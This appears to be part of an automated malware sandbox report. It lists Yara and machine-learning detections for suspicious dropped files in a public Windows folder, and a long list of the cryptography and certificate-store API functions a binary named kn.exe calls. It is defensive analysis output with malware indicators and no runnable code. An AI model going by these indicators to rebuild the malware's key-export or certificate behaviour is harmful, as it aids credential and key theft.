Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 3060, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\sppsvc.pif	Joe Sandbox ML: detected

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665892F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF665892F38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665892C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,	6_2_00007FF665892C2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659566D8 NCryptFreeObject,#360,	6_2_00007FF6659566D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659486D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,	6_2_00007FF6659486D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C26E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,	6_2_00007FF6658C26E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665912724 CryptDecodeObject,GetLastError,#357,	6_2_00007FF665912724
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,	6_2_00007FF6658EA654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956654 NCryptGetProperty,#360,	6_2_00007FF665956654
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,	6_2_00007FF6658F4694
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,	6_2_00007FF6658B6694
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,	6_2_00007FF6658AC5D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,	6_2_00007FF6658E25E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A8600 #357,CryptDecodeObject,GetLastError,LocalFree,	6_2_00007FF6658A8600
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658B0630
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659265B4 NCryptIsKeyHandle,_CxxThrowException,	6_2_00007FF6659265B4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,	6_2_00007FF66591E57C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,	6_2_00007FF66598A58C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF66595A590
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,	6_2_00007FF66589A8CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659208EC BCryptGetProperty,#205,#359,#357,#357,	6_2_00007FF6659208EC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665954914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF665954914
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,	6_2_00007FF66590E914
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920844 BCryptExportKey,#205,#359,#357,#357,	6_2_00007FF665920844
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,	6_2_00007FF66598E8B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658867CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658867CC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF66590C7F0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659207F4 BCryptDestroyKey,#205,#357,	6_2_00007FF6659207F4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659127BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6659127BC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659307D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF6659307D0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A6824 CryptHashCertificate,GetLastError,#357,	6_2_00007FF6658A6824
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665958814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,	6_2_00007FF665958814
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920740 BCryptCloseAlgorithmProvider,#205,#357,#357,	6_2_00007FF665920740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF66595A740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659207A4 BCryptDestroyHash,#205,#357,	6_2_00007FF6659207A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,	6_2_00007FF66598A2E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,	6_2_00007FF6658C0300
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF66594E274
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665958298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,	6_2_00007FF665958298
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658F6280
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665942278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,	6_2_00007FF665942278
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,	6_2_00007FF66590A1E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF66591E1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,	6_2_00007FF66595A1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665986214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,	6_2_00007FF665986214
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66598613C CryptDecodeObjectEx,	6_2_00007FF66598613C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665906194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF665906194
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659461AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,	6_2_00007FF6659461AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF6658E417C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C21A4 #360,#359,#357,#357,BCryptFreeBuffer,	6_2_00007FF6658C21A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,	6_2_00007FF6658F24D4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658944E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658944E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,	6_2_00007FF6658AC514
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,	6_2_00007FF66594E516
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,	6_2_00007FF6658FC450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,	6_2_00007FF6658FA450
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665918488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,	6_2_00007FF665918488
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C23E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,	6_2_00007FF6658C23E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658A4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658A4410
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665958404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,	6_2_00007FF665958404
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665912358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,	6_2_00007FF665912358
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665916374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,	6_2_00007FF665916374
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AE3B0 #357,#357,CryptDecodeObject,LocalFree,	6_2_00007FF6658AE3B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920EF4 NCryptImportKey,#205,#359,#359,#357,	6_2_00007FF665920EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665980ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,	6_2_00007FF665980ED0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956F2C NCryptExportKey,#360,	6_2_00007FF665956F2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,	6_2_00007FF6658B8F1C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665964E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,	6_2_00007FF665964E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665922E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,	6_2_00007FF665922E6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956E48 NCryptSetProperty,#360,	6_2_00007FF665956E48
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,	6_2_00007FF6658C0E94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956EA8 NCryptImportKey,#360,	6_2_00007FF665956EA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658F2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,	6_2_00007FF6658F2E7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594EE94 CryptSignMessage,SetLastError,	6_2_00007FF66594EE94
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956DE0 NCryptCreatePersistedKey,#360,	6_2_00007FF665956DE0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665970DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,	6_2_00007FF665970DB8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665904DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF665904DDC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665948DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,	6_2_00007FF665948DD0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920DD4 NCryptGetProperty,#205,#359,#357,#359,#357,	6_2_00007FF665920DD4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658B0E24
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665952DAC #357,#357,CryptFindOIDInfo,LocalFree,	6_2_00007FF665952DAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665922D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF665922D78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956D78 NCryptOpenKey,#360,	6_2_00007FF665956D78
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920D84 NCryptFreeObject,#205,#357,	6_2_00007FF665920D84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659210D8 NCryptSetProperty,#205,#359,#357,#359,#357,	6_2_00007FF6659210D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659230D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,	6_2_00007FF6659230D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659570C8 BCryptSetProperty,#360,	6_2_00007FF6659570C8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,	6_2_00007FF66594511C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665957124 BCryptGenerateKeyPair,#360,	6_2_00007FF665957124
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658D9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,	6_2_00007FF6658D9134
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595705C BCryptGetProperty,#360,	6_2_00007FF66595705C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665921058 NCryptOpenStorageProvider,#205,#359,#357,	6_2_00007FF665921058
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF66592B0A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,	6_2_00007FF6658C107C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658EB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,	6_2_00007FF6658EB098
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF66592301C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665927020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF665927020
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665919028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,	6_2_00007FF665919028
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66589302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF66589302F
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665897034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,	6_2_00007FF665897034
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595700C BCryptEnumAlgorithms,#360,	6_2_00007FF66595700C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665910F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,	6_2_00007FF665910F58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665904F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,	6_2_00007FF665904F50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66594EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,	6_2_00007FF66594EF74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658B4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,	6_2_00007FF6658B4F90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956FAC BCryptOpenAlgorithmProvider,#360,	6_2_00007FF665956FAC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920FB4 NCryptOpenKey,#205,#359,#357,#357,	6_2_00007FF665920FB4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665922AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,	6_2_00007FF665922AE4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920ABC BCryptVerifySignature,#205,#357,#357,#357,#357,	6_2_00007FF665920ABC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658C2B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,	6_2_00007FF6658C2B00
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665918AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF665918AFC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665928AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,	6_2_00007FF665928AA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665896A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,	6_2_00007FF665896A84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665952A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,	6_2_00007FF665952A78
